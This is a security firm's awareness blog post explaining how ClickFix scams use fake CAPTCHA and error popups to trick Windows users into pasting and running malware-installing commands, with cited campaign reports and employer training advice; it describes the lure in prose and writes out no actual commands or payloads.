ClickFix Scams Target Computer Users Across Industries and Borders
Fake CAPTCHA screens, document error alerts, and phony Facebook messages infect user PCs with data-stealing malware
A clever new cyberscam is wreaking havoc among businesses, hospitality venues, healthcare providers, and other organizations. The scam uses the psychology of social engineering to exploit our human desire to fix little computer problems ourselves, rather than calling IT or opening a ticket. Instead, a pop-up screen on your computer offers simple instructions to fix the document, reload the webpage, or simply prove you are not a robot. Sounds easy enough for the typical computer user, right?
In truth, the easy part is falling for the scam. And no computer user is safe.
Social Engineering: Bad and Getting Worse
Human vulnerabilities, leading to human failures, were responsible for more than two thirds (68%) of all known data breaches in 2024. Rather than being malicious or deliberate, these failures resulted from employees falling for social engineering tricks and making human errors that affected company security, according to the 2024 Data Breach Investigations Report from Verizon.
Social engineering schemes are effective because they prey on our human vulnerabilities, and because they play a numbers game. Like hacking and ransomware, the vast majority of social engineering schemes are financially motivated, delivering easy profits and repeatable successes for their perpetrators. The more individuals a scammer targets, the more victims the scheme exploits, and the greater the profits for the scammer.
On the user side, nobody wants to be the hapless victim. Who really wants to be the one who downloaded the malware? The one who infected their computer, or their local area network? Of course, nobody does. And yet it happens every single day.
Employees everywhere need to be aware of this latest social engineering scam to avoid becoming the next unwitting victim. CISOs, security managers, and IT teams need to organize cybersecurity training for their organizations’ employees—and they need to include how to spot and avoid ClickFix scams.
For Users: How ClickFix Works and What to Watch For
ClickFix deceives users into downloading and running malware on their computers. The scam is able to bypass web browser security features, such as Google Safe Browsing, which makes it appear legitimate to uninformed computer users.
An article in InfoSecurity Magazine in November 2024 described how ClickFix scammers create fake error messages that include instructions for users to fix the ‘error’ by simply copying, pasting, and launching specified commands. Following those steps downloads malware into the users’ computers, and they may not even know it.
-jpg.jpeg?width=437&height=221&name=ClickFix%20-%20Verify%20You%20Are%20Human%20Popup%20(002)-jpg.jpeg)
In some ClickFix scams, users think they are visiting a specific website but are actually on a fake website that is impersonating (or spoofing) a legitimate site. As the user browses, the fake website displays a phony alert message.
Typically, the message warns the user that the webpage or document cannot be displayed correctly, or asks the user to verify they are not a robot before continuing.
In the case of the error message, a Windows user may be instructed to click the “Fix It” button and follow the simple outlined steps. In the case of the robot message, the user sees a fake popup that looks like a CAPTCHA request. Pressing the blue button displays a second popup with three easy, but disastrous, verification steps for users to follow:
- First, press the keyboard key with the Windows icon and the letter “R” at the same time. This opens a Windows Run prompt that will execute any specified program that is already installed on the system.
- Then, press the CTRL key and the letter “V” at the same time. This pastes malicious code from the website’s virtual clipboard.
- Finally, press the Enter key, which causes Windows to download and launch the ClickFix malware through a Windows program (mshta.exe) designed to run Microsoft HTML application files. And let the games begin!
Popular Targets for ClickFix Scams
According to an alert issued by the HHS Health Sector Cybersecurity Coordination Center in October 2024, professional analysis of the ClickFix malware distribution system described attackers targeting users who are browsing online looking for games, PDF readers, Web3 web browsers, and messaging apps, as well as users of the Zoom video conferencing app and the Booking.com app. It also warned that ClickFix scammers continue to devise new variations, such as fake Google Chrome error pages and popups that spoof Facebook, among others. In any of its forms, the ClickFix scams lead to bad outcomes, with users unwittingly copying and executing malicious code that installs malware on their computers and steals their data.
Numerous ClickFix scams use phishing emails that include HTML attachments that spoof Microsoft Office files. When the attachment is opened, the user sees an image of a Microsoft Word document with a pop-up error message instructing them to click the How to Fix button to take care of the problem quickly and easily.-jpg.jpeg?width=632&height=211&name=ClickFix%20-%20Google%20and%20Facebook%20Samples%20of%20Scam%20(002)-jpg.jpeg)
ClickFix scammers especially like phishing in hospitality industry waters by impersonating Booking.com, infecting users of the popular online travel platform with malware that steals financial information from guests. According to Microsoft, attackers send malicious emails that impersonate Booking.com and mention believable tidbits like guest reviews, requests from prospective guests, or online promotions to lure individuals into falling for one of the ClickFix variations. Attackers are continuing to target hospitality organizations throughout North America, Europe, Oceania, and Southeast Asia who are likely to use the online travel platform.
Why ClickFix Keeps Evolving
ClickFix is able to bypass conventional and automated security features, according to the InfoSecurity article, because the ClickFix model prompts computer users to infect themselves with malware by following simple, believable steps.
Due to this appealing feature, and because ClickFix has proven to be a highly effective way to deploy malware that steals information, including financial data, phishing schemers are escalating their use of ClickFix.
This means that ClickFix tactics will keep evolving as cybercriminals look for ways to continue exploiting users for fun and profit. When successful scams are this simple and adaptable, no bad actor will walk away from such easy financial gain.
For Techs: How ClickFix Works
The ClickFix scam has been investigated by Microsoft, Proofpoint, and other tech firms and described in a number of security articles and bulletins. Cybercriminals initiate the scams by using stolen credentials to log into websites and install fake plugins in the compromised environments. Once installed, the plugins inject malicious JavaScript that contains a known variation of fake browser update malware. The malware uses blockchain and smart contracts to obtain malicious payloads in a practice known as EtherHiding.
When executed in the browser, JavaScript presents users with fake browser update notifications that guide them to install malware on their computer. The malware usually consists of remote access trojans and various infostealers, such as Vidar Stealer, DarkGate, and Lumma Stealer.
The ClickFix scam targeting Booking.com began in December 2024, and Microsoft Threat Intelligence has traced it to a threat cluster known as Storm-1865. Rather extensive analysis by Proofpoint noted numerous ClickFix campaigns conducted by a variety of bad actors dating to March 2024. According to that analysis, much of the ClickFix activity impersonating CAPTCHA (“Verify You Are Human”) uses an open source toolkit called reCAPTCHA Phish, which was found to be available on GitHub in September 2024. GitHub is a proprietary platform that allows developers to create, store, manage, and share their code using distributed version control.
On September 18, Proofpoint identified a campaign that used GitHub notifications to deliver malware, with the threat actor either commenting on or creating an issue in a GitHub repository. That action led to the repository owner, issue owner, or other collaborators receiving a fake security warning from GitHub. The warning contained a link to a phony GitHub website, which used reCAPTCHA Phish and ClickFix to trick users into executing a PowerShell command on their computers.
The fake GitHub landing page contained verification steps that would lead to the execution of PowerShell code and installation of Lumma Stealer in order to pilfer data. The landing page also contained a fake reCAPTCHA message at the end of the copied command to avoid the malicious command being visible in the run-box, according to Proofpoint.
What Employers and Users Should Do Now
ClickFix is a phishing exploit, which by its nature uses social engineering to trick users into careless cyber behavior. As with most threats, knowledge is power, and users who have been informed about ClickFix and how it works are better able to avoid becoming victims. Employers play a vital role in educating their employees in order to prevent damages from the scam.-png.png?width=540&height=440&name=images%20for%20Blog%204-1%20(880%20x%201080%20px)-png.png)
Action 1: Educate users to modify behaviors. Organizations with training departments should already be providing cybersecurity training to all employees, including management, on an annual basis at minimum. Be sure that phishing schemes feature prominently in the training, with descriptions and examples of the most common and emerging schemes to help users spot those tricks. When a new exploit becomes known, send email alerts to employees to raise awareness and vigilance. Post bulletins in common areas and on internal company news platforms.
Organizations who do not have in-house training teams can use expert third party resources who specialize in cybersecurity awareness training with emphasis on phishing and other social engineering schemes. 24By7Security offers this training content along with various delivery methods.
Simple User Tip: An easy way to detect potential phishing emails is to hover your cursor over the sender’s email address. Does that email address match what’s displayed in the From field? Does it look suspicious for any other reason? Employees should always check the sender’s email address to verify its authenticity. It only takes a second.
Action 2: Utilize tools that detect phishing schemes. To detect and prevent phishing schemes, organizations can use tools such as email filters, antivirus and antimalware software, authentication solutions, and phishing simulation platforms, as a few examples. AI-powered solutions that analyze emails and websites for suspicious patterns are also available, as are various email threat scanning tools that detect vulnerabilities in Microsoft products.
Before installing any such tools, try to confirm whether they are effective in detecting and preventing ClickFix popups and ClickFix malware, bearing in mind that ClickFix is known to be able to bypass conventional and automated security features.
Summary
Social engineering and phishing scams are here to stay due to the relative ease with which human vulnerabilities can be exploited. The ClickFix scam is fairly new on the scene and is already evolving to deliver a greater variety of fix-it-yourself choices for users to click. Increasing cybersecurity awareness among employees, and requiring ongoing training that includes phishing scams, are two tactics that can be highly effective in any organization, especially when combined with proven security technologies and robust cybersecurity practices. Contact a cybersecurity expert for next steps to secure your organization.
